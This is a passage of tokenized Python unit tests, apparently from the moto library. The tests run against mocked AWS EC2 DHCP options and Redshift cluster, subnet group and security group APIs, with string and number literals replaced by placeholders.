: <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . associate_dhcp_options ( dhcp_options . id , "<STR_LIT:foo>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_options_delete_with_vpc ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . 
connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_options = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> dhcp_options_id = dhcp_options . id <EOL> vpc = conn . create_vpc ( "<STR_LIT>" ) <EOL> rval = conn . associate_dhcp_options ( dhcp_options_id , vpc . id ) <EOL> rval . should . be . equal ( True ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( dhcp_options_id ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> vpc . delete ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ dhcp_options_id ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_create_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( SAMPLE_DOMAIN_NAME ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( SAMPLE_NAME_SERVERS [ <NUM_LIT:0> ] ) <EOL> dhcp_option . options [ u'<STR_LIT>' ] [ <NUM_LIT:1> ] . should . be . equal ( SAMPLE_NAME_SERVERS [ <NUM_LIT:1> ] ) <EOL> @ mock_ec2 <EOL> def test_create_dhcp_options_invalid_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> servers = [ "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" , "<STR_LIT:f>" ] <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . create_dhcp_options ( ntp_servers = servers ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . 
equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . create_dhcp_options ( netbios_node_type = "<STR_LIT:0>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_describe_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_options = conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options = conn . get_all_dhcp_options ( ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> @ mock_ec2 <EOL> def test_describe_dhcp_options_invalid_id ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ "<STR_LIT:1>" ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options ( ) : <EOL> """<STR_LIT>""" <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_options = conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> dhcp_options . should . be . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_dhcp_options ( dhcp_option . id ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . get_all_dhcp_options ( [ dhcp_option . id ] ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . 
none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options_invalid_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( "<STR_LIT>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_delete_dhcp_options_malformed_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( ) <EOL> with assert_raises ( EC2ResponseError ) as cm : <EOL> conn . delete_dhcp_options ( "<STR_LIT>" ) <EOL> cm . exception . code . should . equal ( '<STR_LIT>' ) <EOL> cm . exception . status . should . equal ( <NUM_LIT> ) <EOL> cm . exception . request_id . should_not . be . none <EOL> @ mock_ec2 <EOL> def test_dhcp_tagging ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp_option = conn . create_dhcp_options ( ) <EOL> dhcp_option . add_tag ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> tag = conn . get_all_tags ( ) [ <NUM_LIT:0> ] <EOL> tag . name . should . equal ( "<STR_LIT>" ) <EOL> tag . value . should . equal ( "<STR_LIT>" ) <EOL> dhcp_option = conn . get_all_dhcp_options ( ) [ <NUM_LIT:0> ] <EOL> dhcp_option . tags . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_option . tags [ "<STR_LIT>" ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_tag ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp1 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp1 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp2 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp2 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp2 . 
add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT:Name>' ] . should . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT:Name>' ] . should . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . tags [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' } <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = filters ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:2> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_id ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp1 . add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp1 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp1_id = dhcp1 . id <EOL> dhcp2 = conn . create_dhcp_options ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> dhcp2 . 
add_tag ( '<STR_LIT:Name>' , '<STR_LIT>' ) <EOL> dhcp2 . add_tag ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> dhcp2_id = dhcp2 . id <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:2> ) <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = { '<STR_LIT>' : dhcp1_id } ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets = conn . get_all_dhcp_options ( filters = { '<STR_LIT>' : dhcp2_id } ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> dhcp_options_sets [ <NUM_LIT:0> ] . options [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . should . be . equal ( '<STR_LIT>' ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_value_filter ( ) : <EOL> ec2 = boto3 . resource ( '<STR_LIT>' , region_name = '<STR_LIT>' ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> filters = [ { '<STR_LIT:Name>' : '<STR_LIT:value>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] <EOL> dhcp_options_sets = list ( ec2 . dhcp_options_sets . 
filter ( Filters = filters ) ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:1> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_key_filter ( ) : <EOL> ec2 = boto3 . resource ( '<STR_LIT>' , region_name = '<STR_LIT>' ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> ec2 . create_dhcp_options ( DhcpConfigurations = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> ] ) <EOL> filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] <EOL> dhcp_options_sets = list ( ec2 . dhcp_options_sets . filter ( Filters = filters ) ) <EOL> dhcp_options_sets . should . have . length_of ( <NUM_LIT:3> ) <EOL> @ mock_ec2 <EOL> def test_dhcp_options_get_by_invalid_filter ( ) : <EOL> conn = boto . connect_vpc ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> conn . create_dhcp_options ( SAMPLE_DOMAIN_NAME , SAMPLE_NAME_SERVERS ) <EOL> filters = { '<STR_LIT>' : '<STR_LIT>' } <EOL> conn . get_all_dhcp_options . when . called_with ( filters = filters ) . should . throw ( NotImplementedError ) </s>
<s> from __future__ import unicode_literals <EOL> import boto <EOL> import sure <EOL> from moto import mock_ec2 <EOL> @ mock_ec2 <EOL> def test_windows ( ) : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> import boto <EOL> from boto . redshift . exceptions import ( <EOL> ClusterNotFound , <EOL> ClusterParameterGroupNotFound , <EOL> ClusterSecurityGroupNotFound , <EOL> ClusterSubnetGroupNotFound , <EOL> InvalidSubnet , <EOL> ) <EOL> import sure <EOL> from moto import mock_ec2 , mock_redshift <EOL> @ mock_redshift <EOL> def test_create_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> db_name = "<STR_LIT>" , <EOL> cluster_type = "<STR_LIT>" , <EOL> availability_zone = "<STR_LIT>" , <EOL> preferred_maintenance_window = "<STR_LIT>" , <EOL> automated_snapshot_retention_period = <NUM_LIT:10> , <EOL> port = <NUM_LIT> , <EOL> cluster_version = "<STR_LIT:1.0>" , <EOL> allow_version_upgrade = True , <EOL> number_of_nodes = <NUM_LIT:3> , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( cluster_identifier ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:username>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( [ ] ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( None ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . 
equal ( <NUM_LIT:10> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:1.0>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( True ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:3> ) <EOL> @ mock_redshift <EOL> def test_create_single_node_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> db_name = "<STR_LIT>" , <EOL> cluster_type = "<STR_LIT>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( cluster_identifier ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:username>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> @ mock_redshift <EOL> def test_default_cluster_attibutes ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( None ) <EOL> assert "<STR_LIT>" in cluster [ '<STR_LIT>' ] <EOL> cluster [ '<STR_LIT>' ] . should . 
equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT:1.0>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( True ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:1> ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_in_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet . id ] , <EOL> ) <EOL> redshift_conn . create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_subnet_group_name = '<STR_LIT>' , <EOL> ) <EOL> cluster_response = redshift_conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( '<STR_LIT>' ) <EOL> @ mock_redshift <EOL> def test_create_cluster_with_security_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . 
create_cluster ( <EOL> cluster_identifier , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_security_groups = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> cluster_response = conn . describe_clusters ( cluster_identifier ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> group_names = [ group [ '<STR_LIT>' ] for group in cluster [ '<STR_LIT>' ] ] <EOL> set ( group_names ) . should . equal ( set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_with_vpc_security_groups ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> ec2_conn = boto . connect_ec2 ( ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> security_group = ec2_conn . create_security_group ( "<STR_LIT>" , "<STR_LIT>" , vpc_id = vpc . id ) <EOL> redshift_conn . create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> vpc_security_group_ids = [ security_group . id ] , <EOL> ) <EOL> cluster_response = redshift_conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> group_ids = [ group [ '<STR_LIT>' ] for group in cluster [ '<STR_LIT>' ] ] <EOL> list ( group_ids ) . should . equal ( [ security_group . id ] ) <EOL> @ mock_redshift <EOL> def test_create_cluster_with_parameter_group ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . 
create_cluster ( <EOL> "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> cluster_parameter_group_name = '<STR_LIT>' , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_cluster ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_clusters . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterNotFound ) <EOL> @ mock_redshift <EOL> def test_delete_cluster ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster ( <EOL> cluster_identifier , <EOL> node_type = '<STR_LIT>' , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> clusters = conn . describe_clusters ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> list ( clusters ) . should . have . length_of ( <NUM_LIT:1> ) <EOL> conn . delete_cluster ( cluster_identifier ) <EOL> clusters = conn . describe_clusters ( ) [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> list ( clusters ) . should . have . length_of ( <NUM_LIT:0> ) <EOL> conn . delete_cluster . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterNotFound ) <EOL> @ mock_redshift <EOL> def test_modify_cluster ( ) : <EOL> conn = boto . connect_redshift ( ) <EOL> cluster_identifier = '<STR_LIT>' <EOL> conn . create_cluster_security_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . create_cluster_parameter_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> conn . 
create_cluster ( <EOL> cluster_identifier , <EOL> node_type = '<STR_LIT>' , <EOL> master_username = "<STR_LIT:username>" , <EOL> master_user_password = "<STR_LIT:password>" , <EOL> ) <EOL> conn . modify_cluster ( <EOL> cluster_identifier , <EOL> cluster_type = "<STR_LIT>" , <EOL> node_type = "<STR_LIT>" , <EOL> number_of_nodes = <NUM_LIT:2> , <EOL> cluster_security_groups = "<STR_LIT>" , <EOL> master_user_password = "<STR_LIT>" , <EOL> cluster_parameter_group_name = "<STR_LIT>" , <EOL> automated_snapshot_retention_period = <NUM_LIT:7> , <EOL> preferred_maintenance_window = "<STR_LIT>" , <EOL> allow_version_upgrade = False , <EOL> new_cluster_identifier = "<STR_LIT>" , <EOL> ) <EOL> cluster_response = conn . describe_clusters ( "<STR_LIT>" ) <EOL> cluster = cluster_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:7> ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( False ) <EOL> cluster [ '<STR_LIT>' ] . should . equal ( <NUM_LIT:2> ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_cluster_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet1 = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> subnet2 = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet1 . id , subnet2 . id ] , <EOL> ) <EOL> subnets_response = redshift_conn . 
describe_cluster_subnet_groups ( "<STR_LIT>" ) <EOL> my_subnet = subnets_response [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> my_subnet [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> my_subnet [ '<STR_LIT>' ] . should . equal ( "<STR_LIT>" ) <EOL> subnet_ids = [ subnet [ '<STR_LIT>' ] for subnet in my_subnet [ '<STR_LIT>' ] ] <EOL> set ( subnet_ids ) . should . equal ( set ( [ subnet1 . id , subnet2 . id ] ) ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_create_invalid_cluster_subnet_group ( ) : <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group . when . called_with ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ "<STR_LIT>" ] , <EOL> ) . should . throw ( InvalidSubnet ) <EOL> @ mock_redshift <EOL> def test_describe_non_existant_subnet_group ( ) : <EOL> conn = boto . redshift . connect_to_region ( "<STR_LIT>" ) <EOL> conn . describe_cluster_subnet_groups . when . called_with ( "<STR_LIT>" ) . should . throw ( ClusterSubnetGroupNotFound ) <EOL> @ mock_redshift <EOL> @ mock_ec2 <EOL> def test_delete_cluster_subnet_group ( ) : <EOL> vpc_conn = boto . connect_vpc ( ) <EOL> vpc = vpc_conn . create_vpc ( "<STR_LIT>" ) <EOL> subnet = vpc_conn . create_subnet ( vpc . id , "<STR_LIT>" ) <EOL> redshift_conn = boto . connect_redshift ( ) <EOL> redshift_conn . create_cluster_subnet_group ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> subnet_ids = [ subnet . id ] , <EOL> ) <EOL> subnets_response = redshift_conn . 